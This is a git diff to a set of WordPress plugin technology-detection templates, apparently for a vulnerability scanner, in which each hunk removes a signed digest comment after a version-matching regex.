a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b908f6d4cb6b93291846fa49e4a0c406d1584b5b7a12238ae2ebdb0acbef8b5f022043984594cc8b60dfac64084f7a8294f734e679f49bcb7f4970b2294b045154d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index beb9e35c46..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210097b90758079ab8c6fb09b7e30eeeed631ea9d53c660e9896e0d79956e399cf6b022100c26421ebf9d2eac8776858caa514995a0a772e6fdb22956035f08c538b017274:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 145f74d806..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201782cd0bcce9c13db5a6e38fb63a2c8c30957e14b8fdb436646791e5e6b30f43022100c66000f799106d297c5a71c039de882f53496b7b313f5d8a6cdcf26623e07fcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 21e0f12172..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203ced6507644a1bb1a3ce94f51d9aa92aebe82d0b0a7225ee4e9a9df3df8f2f52022019cb1aecb38e12b262a40dbf925a40be2bd87199cb2e354a0d6c7993576e20dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 0bf4b84c03..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008324d7faa71aa472057417dc474260f265f20357dd69dba0d2f1228b9462e2b1022100c7fe50abc194761459b64c1a8eb0ed6928438b6486af1e6713c3d64c0d786136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 80d8311ead..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022050bfdc1b016abc6519b737a378b68ae4d78933364843ec94406928bb430c1b5e0220240d1ed79216fd1be6dd606a5a252aa70886b73314c188e95e57b93eee1899ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 73d41f32db..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207df2ea69921422bbcc246cbff12e6293bd0a8cbe7f5dd61c0f404f079607edfc022072594547f6ad0aca0198c2f86f697e8120fd58ecd0caa591d69a6ef6d5558f0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 1229827cfd..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201d97c992eb9410757cd5d1e81fd7bf4ee6f2fe82b89e12844015ec1a06766c0a022100b21529671646d72ee8769de037b09eaf4ff742375647ae6f158fa9948862412d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index f599994dae..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b04479c8595017899c73fbed5c03eea505c936597e59fb2fcdb8a97af3369c65022059df2cf156cc95b39288c05d3c14dee05bd15681c09f8d30c9f5c8a1daa052fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 39aa2fb08f..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c74ccc5358f149659a1816595c1a79b07b4fcbd585fd70c9840dc7cbb34ad9ae02206f812796c9733931133948b54386a649108fe4e58429775356f2499ca5d85712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index d8ed3f7813..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202fb97129128d726c94715aef7e5efd013433124315869ad1cb5cdacda8bfca5f022075462e0f14e87fa195e863c1ac0f04a63a8aa53110b38f8b004bb91a0b6699d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index ead4854fde..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f43d2e1c81f05974354bec07fbd1d61d933f905c9d7051c59d4a8c452441b98b022100c06f381b88f9d87d8f3b38fc8a3f36a4b7912bd58f13a848404e8521600982b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 2805bfe423..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220690aa22de841a4565f23ad67b72195ca0de1237e81ec519379a8069460729972022100a8291c18d0c74465e39fe9cddf26619526840860906f233c45dea68344fd807b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 1b3bc4df12..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207e00f49de3fe478b66164964365341fb2b2256a904a4ecb21ad513b2750b0756022016ec06b4bee3cc6aafe99b2db3a13b64646892425aff62b95f6bfb37d4040867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index bb881e8a28..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022075b73febe3ff06b6dcfed643eeda968d823133773467fefc27fcbbb88259b16302206c39309afe06b47257035b29cd125b685b04c6f174c31f4adfdcaf4c3ecb6378:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 232867c6b9..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206e439512a6c35734283e67741a6bc01e441ce457874b7b98a37414c0a360cce702206c6cf039f22bebc62105b30721442279f4b522cb139e4b8f2d700723349effcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index ce12a98816..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dec77d93d33b0a592c62a934e3936dffea8f0d1e89bbfb2f4d1253779d1aa50e0221009b5518a10a1daa440474c56b7c462f521b6626d871e927390d2612644bdff27b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index c90a854e69..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022035f9d095c41ab0d3f391683467a9c53b0de3497ad1f103125ab9fb828a414ed402207eb9f16a123ee750d831cc552aa11412e8377dff1423f35e9d3d4d1a392b2ccb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a7a9fdb63e..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205be3383cb9b084dabb44062477a21b97b64d50cc76947372c0ce9d60b3887da7022070838964786011f26a7ed2b2ea742a5e29c7f143043a9c2e48bfaa09be41de5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index c877300883..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009a5ff37e5fac7f4153b6131ccaf8f898ac9386a1f62745b9c26c1ca22e28b8c30220302d51df30e2751e88c0c735cd6ccb051ee929335b6d7c24f213bc73844610f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 088efba661..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202f8ec2ca8016d6dea0634ee3fa96ff19653ef8f3d1019d7c882552b0de94275c02200df039c05ef42d3513b1b242034a248500e383f05791fee65a74df7b0cf10883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 46a0e7d242..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100de54cca0eccf4bb140e00add1fe63235a58943aaf474dc8b8fe1005c29add71c02210093e5d4d4c308fb1e43dfe8fe3bd1e7fdddf40382821169f5da970a72ac5d491c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 4f623eaf83..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008ac5b8c4179b99fdd4271b843f399a806a35f3e77d5b04c7b46edec7a0f4053002200f04088b4685817032203dca46b687f09695cb20bfa37420525ae9eb1368be55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index d5f2718f37..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b4c34d6656e1c2ccd81d870fe427361464c31c16d393bbbf66c85b35c5f3117a022100a64998adc291eaecb67f5646a46844c83e2aa06fdd43acff23b2331af721a864:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index de2fe49832..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220753036e03aaa3dbe280f639079177fbe1b66e127da51ff615527213bdd4a1205022033d383b372734518f3defaff78b602917ed2f3af822a4f7350c924d3d1713039:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index cb5ad6b3a1..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201f8f82bf5febba8e2db86a845827134673b9ba9d8e795c21b9ef8644612d9900022044c4a42d70041e93c64bdbd68bde4e830400287f92c91f31b709f83ff02e4686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index f22a7e6a3e..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220300b2ba420748fb85320956e1f97669e6712a8ba8f8a84a0599128a251cb9876022100c14cc3f1d4e2b7df9f1e5bf9c175a7f743082fa21fc59b0dcba059c0a247d04f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index b84ff9ef20..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205cfd3b23045537e657f15d845eb6545268da64e22c76c8093351ff34b8389a6b022100d977fa68d216ca750a10c57f511b392accff36b62b67e12211558b621212da78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fb1672e1f6..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022006cdf48c3b9568b507ec3274c276e12cc65badbcd98e94ba8ed232342dbb2a15022100cfadbdc5cb4b43fc973319092b425ece6b0157a075c0f2127848e4b4db6414b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 241b665891..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e2875570753c60f6a0f2b1b733cc3e8c4b7786454b6041c1efbf15994f97180b022100c74ff866e1f54782f693721384ed8e27a0016f307f3e69af432a373b518c6680:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index a23088bd81..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cfbca309ca3ead79620290dc4076619dadbdcc1edb0b9f928086faaad84f60f502205fa2fbb948fc13d9db8b6c6d63cb4053b3d291323dd5bedf6d08b390d18f9b31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 1f05aaa4ef..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203127969a8b5499f56bb733bdd0920c3d79d8339b2ae3c4589a025f35ce3ad5af02202c044d0c80268f22398acdfd92532b5c324c080ad1a687a926305e3c2300b9cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 84c3b5da11..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220447d0556ac39135757b1446a0e5563ae89cf57d57950e1b92abbf7e76e8fdd15022038f47bd4d79b5e32704325cb0acc022d4316ef484dbe1e423ce3000a95f2e264:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9a93467549..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009edd0156c5cc8b5b678699334e1957281658dd849db3b786dcbea34e851d87ef0221008fe8e53ce2b0240810d04fbadc644d04d55e3d71d73fb0a8e8f306d3bce20c67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 3e97323b19..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ae41d8479a77bc646b7b723b038589f1f10d7166ec4d14a867b1b106d01ef03602210099fc656ee0d7909ad4893e1bb4757d7e13d0c664a970013ac1d8ca39bf760650:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 43d263fc8d..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e18685816c6012c4f10e38ebacda9bb15922135acd00d6bcd07025565fdcc5e6022100d5f690d44aa4aae3128117be4e6f3e23ac8789e44b98ee5781c628018e6e7d50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index d757b72dc0..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220780d62ddfd7598d22221567ab7b795b86ed19405bccaa529b2f8c4ab528c9ed80221009862677dedffe28ccf8c7bc6eec23a4d07b0efbc04aadb76850d70cd16d4e459:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 141e501dbc..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fa0ed357a683b5445b0d5b9d9222ff3dcd06aa2a7fd976ccd8b6c1bbba596aab022067367a8e52812e8f8ae9d95686507344c4f6cdbad2b6c04e2b29a1d72468dbdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index c02ce33b98..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207fd4bc920c77930f54ebfa9c3e797239ce279501c134d8cdcc56b85c1d880ec60220701afa4523cfe387efe54bd67215e97d2d886566820f4fd8ef55cfe3f49636d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index bf6a35e349..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e362f0e91fcbc3a63c628b4f0d3bd24c9aa4866f41e40f0628738bd316a96d702205b0c8277424c3efeb8288cd8da0116756970d5d554ee831c039a5c59e3b774e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 055daeb94b..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203516c1d8aa0db0f02b6abe7c96a110dc1214b33581aeb2ace32d65c5bbc1b6fe0221008f44361b4c10773311522681f62d208e24b2c880f2ed47b44e6ab1799f3cd74f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index a7c6b3dd8f..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207082f801483226470e10b54e66c05254fad0251dee96484f2cdd403e53759500022100b1ca3dc47d89cc547f925f64696d21f472e49f28d67b62541763f6b408632a11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index e51ebf4706..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fbd3ba1b0ab93948325bfe1665e6a7f1300d67c9078eb6153227cf827e9cf2ef02200e9686a7327a4af0948a9abdb888a855c82babfaa9ca76e71993cad86c9f7a73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 23751d6112..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100abfc25744401a03dcb216b50d84fa546e88207237db0a3c2cbae9ef45a198197022100ef5ffc2a613627626d535cae1edcce251040e938e175f1b1710de0c5a3d952c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index ef3f7823a3..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d055b7bfd5584008f0bab3a3b863430d109fcf855fd0660bd99ed087c3bfc29302206cb192af79e9fc49fb40057128f910005d122473f170a2ab5a927fe683b4f906:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 4d0202eb1b..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009b488e09c22e61758d7740fb01e6e6b27646b2c52942082bf5ccd64fb58932c402207adafbbfab96f3b28a66d76092a1f9c74bf5550e6b06388e63347166ee77b832:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index fd7807f0c4..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb0b374d28497dbaacc5d1e60398d2f1265f7a36d8cbf579321acd22879b95640220741184e075f30a4aeb13e4b0bf7b7aa9932012aac1a18c4b30bf2b6fa795ad01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index e9166fcb94..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ 